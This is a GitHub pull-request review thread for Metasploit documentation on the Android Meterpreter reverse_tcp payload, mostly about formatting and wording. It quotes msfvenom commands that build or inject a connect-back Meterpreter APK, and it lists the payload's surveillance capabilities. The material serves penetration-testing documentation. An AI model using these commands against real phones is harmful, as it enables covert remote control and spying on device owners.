Update reverse_tcp.md
rapid7/metasploit-framework pull request #16342
Opened 2022-03-14 04:56 UTC by Anshik-Singh

Edited reverse_tcp.md added new some  tool links to use. and tried to make easy explanation. Thank you.

2022-03-14 15:58 UTC, gwillcox-r7 commented
> If these changes are able to merge please merge them. Thank You.
![9611d2fde013a9a5fca0d2766b44d09a](https://user-images.githubusercontent.com/63261883/158211400-3cd8229f-2464-4a1a-bffc-26237abbc5fa.jpg)

2022-03-14 16:59 UTC, gwillcox-r7 requested changes
If I'm being honest I'm a little confused on this proposed change. There doesn't seem to be much changed here other than adding a link to the BlueStacks page, as most other changes are mostly changing the order of paragraphs around or come down to personal preference changes. I do see some potential benefit with the handler changes however keep in mind that most modules present examples with the `multi/handler` use case. Really either way is fine, the only benefit here is that your way will work multiple times in a row vs `multi/handler` only handling one attempt at a time.

Left feedback on all proposed changes though, but just thought I'd explain this so you can understand why I'm a little confused about some of these changes.

2022-03-14 16:59 UTC, gwillcox-r7 commented on documentation/modules/payload/android/meterpreter/reverse_tcp.md
> +./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
```suggestion
./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT TO CONNECT BACK ON] -f raw -o /tmp/android.apk
```

Don't want to limit this to just one port or give the impression that it has to be set to a specific value.

2022-03-14 16:59 UTC, gwillcox-r7 commented on documentation/modules/payload/android/meterpreter/reverse_tcp.md
>  The Android Meterpreter allows you to do things like take remote control the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc
Might be good to update this section with a new section like `## Overview` or similar if we are going to be adding more sections below this.

2022-03-14 16:59 UTC, gwillcox-r7 commented on documentation/modules/payload/android/meterpreter/reverse_tcp.md
> +### To create the APK with msfvenom:
```suggestion
## To create the APK with msfvenom:
```

This isn't really a subsection and so it should follow the same level 2 heading format as the rest of this document.

2022-03-14 16:59 UTC, gwillcox-r7 commented on documentation/modules/payload/android/meterpreter/reverse_tcp.md
> +### To inject meterpreter into an existing APK with msfvenom:
```suggestion
## To inject meterpreter into an existing APK with msfvenom:
```

This isn't really a subsection and so it should follow the same level 2 heading format as the rest of this document.

2022-03-14 16:59 UTC, gwillcox-r7 commented on documentation/modules/payload/android/meterpreter/reverse_tcp.md
> +./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
I'd also recommend updating this to make it more clear that the `-x` parameter is a local file and not some string. Something like this might work:

```suggestion
./msfvenom -p android/meterpreter/reverse_tcp -x <PATH TO LOCAL APK FILE> LHOST=[IP] LPORT=[PORT TO CONNECT BACK ON] -f raw -o /tmp/android.apk
```

2022-03-14 16:59 UTC, gwillcox-r7 commented on documentation/modules/payload/android/meterpreter/reverse_tcp.md
> +
```suggestion

```

2022-03-14 16:59 UTC, gwillcox-r7 commented on documentation/modules/payload/android/meterpreter/reverse_tcp.md
>  * [GenyMotion](https://www.genymotion.com/download/) - Requires an account.
Should align following line with indentation of this line.

2022-03-14 16:59 UTC, gwillcox-r7 commented on documentation/modules/payload/android/meterpreter/reverse_tcp.md
>  ```
If I'm being honest I'm a little confused on this change. There doesn't seem to be much changed here other than reformatting it to your personal preference? Near as I can tell the only difference in this PR has been the addition of the BlueStacks link, the rest has just been reorganizing the wording into different areas.

2022-03-14 16:59 UTC, gwillcox-r7 commented on documentation/modules/payload/android/meterpreter/reverse_tcp.md
> +To start listner run msfconsole in terminal and then set listner settings:
```suggestion
To start a listener run `msfconsole` in terminal and follow the following steps:
```

2022-03-14 16:59 UTC, gwillcox-r7 commented on documentation/modules/payload/android/meterpreter/reverse_tcp.md
> +msf payload(reverse_tcp) > sessions -i 1   (To set the session to proceed the attack)
This section doesn't make sense. You should explain to the end user that you have now executed the APK on the target and thus have gotten the session. If anything there should be output showing the connection back to you within `msfconsole` but you don't show this or otherwise provide any evidence as to how the session is obtained. It just *poof* appears. 

You need to explain how you get this session. I don't care if you break this up into two code segments and remove your comments in `( )`, as that would actually make the output cleaner and would allow you to take a paragraph or so to explain what has occurred, how you get the session, and what your going to do next, and then you code can showcase the instructions to do that.

2022-03-15 15:10 UTC, gwillcox-r7 commented
Going to go ahead and apply updates from the review process so long, hold onto your horses 😄

2022-03-15 15:41 UTC, Anshik-Singh commented
Yes, You get it right I am very young beginner. So, I need your help I am really interested in this project.

2022-03-15 15:56 UTC, gwillcox-r7 commented on documentation/modules/payload/android/meterpreter/reverse_tcp.md
> +msf payload(reverse_tcp) > sessions -i 1   (To set the session to proceed the attack)
Resolved as updated change doesn't contain this information anymore, was decided change didn't make sense in grand scheme of this documentation.

2022-03-15 16:24 UTC, gwillcox-r7 commented
> Now I am fully confused . As a beginner I think I should make changes . I am not getting anything in my mind what's going on. Should I close This pull up request.

So I can still land this in its current state, the main issue was that most of your changes were purely reorganizing the order of contents within this file. This was the majority of changes which I undid as it made the explanation of things harder to understand.

The other changes you made that I could see where the inclusion of the BlueStacks link, which I've included, and the change to use `multi/handler`, which I dropped only because the existing explanation makes more sense with the way the document is structured.

Finally I added a few changes to meet our standards. The tool `tools/dev/msftidy_docs.rb` applies our MsfTidy standards to documentation files so I fixed up some issues related to that which is where you might have seen some extra changes come into play.

Hopefully that makes more sense but let me know if not. I'm just waiting for tests to pass and then I can land this once that's done.

2022-03-15 18:55 UTC, gwillcox-r7 approved these changes

2022-03-15 19:19 UTC, merged